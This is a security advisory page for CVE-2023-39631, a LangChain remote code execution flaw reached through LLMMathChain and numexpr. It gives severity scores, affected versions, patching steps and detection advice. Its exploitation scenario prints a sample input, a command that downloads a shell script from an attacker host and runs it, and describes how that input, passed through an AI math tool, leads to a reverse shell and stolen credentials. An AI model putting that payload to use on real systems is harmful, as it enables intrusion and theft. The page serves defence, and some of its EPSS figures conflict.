CVE-2023-39631 — CRITICAL (CVSS 9.8) AI Security Vulnerability

Q: Is CVE-2023-39631 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-39631, increasing the risk of exploitation.

Q: How to fix CVE-2023-39631?

1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies. 2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments. 3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions. 4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs. 5. VERIFY: Post-patch, confirm resolved version with `pip show langchain numexpr` and validate no transitive reinstallation of vulnerable versions via dependency resolution.

Q: What systems are affected by CVE-2023-39631?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM application pipelines, math and calculation tool chains, RAG pipelines with calculation tools, model serving with LangChain middleware.

Q: What is the CVSS score for CVE-2023-39631?

CVE-2023-39631 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.58%.

CISO Take

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

Risk Assessment

Critical. CVSS 9.8 with network-accessible attack vector, low complexity, and zero privilege requirements makes this trivially exploitable by any unauthenticated attacker. LangChain is among the most widely deployed AI frameworks in production, meaning blast radius is exceptionally high. The EPSS of 3.3% understates real-world risk given public PoC availability at time of disclosure. Organizations running LangChain-powered chatbots, agents, or APIs with math tools exposed are effectively offering unauthenticated shell access.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
langchain	pip	—	No patch
135.7K OpenSSF 6.5 2.6K dependents Pushed 7d ago 17% patched ~256d to patch Full package profile →
langchain	pip	< 0.0.308	`0.0.308`
135.7K OpenSSF 6.5 2.6K dependents Pushed 7d ago 17% patched ~256d to patch Full package profile →
numexpr	pip	< 2.8.5	`2.8.5`

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

1.6%

chance of exploitation in 30 days

Higher than 82% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

PATCH

Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies.
INVENTORY

Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments.
WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions.
DETECT

Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs.
VERIFY

Post-patch, confirm resolved version with pip show langchain numexpr and validate no transitive reinstallation of vulnerable versions via dependency resolution.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Agent Plugin AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.2 - AI-related processes for suppliers and partners

NIST AI RMF

MANAGE 2.2 - Manage AI risks from dependencies and supply chain

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-39631?

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

Is CVE-2023-39631 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-39631, increasing the risk of exploitation.

How to fix CVE-2023-39631?

1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies. 2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments. 3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions. 4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs. 5. VERIFY: Post-patch, confirm resolved version with `pip show langchain numexpr` and validate no transitive reinstallation of vulnerable versions via dependency resolution.

What systems are affected by CVE-2023-39631?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM application pipelines, math and calculation tool chains, RAG pipelines with calculation tools, model serving with LangChain middleware.

What is the CVSS score for CVE-2023-39631?

CVE-2023-39631 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.58%.

Technical Details

NVD Description

An issue in LanChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary code via the evaluate function in the numexpr library.

Exploitation Scenario

An adversary targets a publicly accessible LangChain-powered API or chatbot that offers calculation capabilities via LLMMathChain. The attacker submits a crafted mathematical expression as input — e.g., `__import__('os').system('curl attacker.com/shell.sh|bash')` — which LangChain forwards unsanitized to numexpr.evaluate(). numexpr interprets this as a valid Python expression and executes it with the application server's privileges. The attacker establishes a reverse shell (AML.T0072), exfiltrates stored API keys, model configs, and RAG database credentials, then pivots laterally to internal model registries or vector databases. No authentication is required at any stage.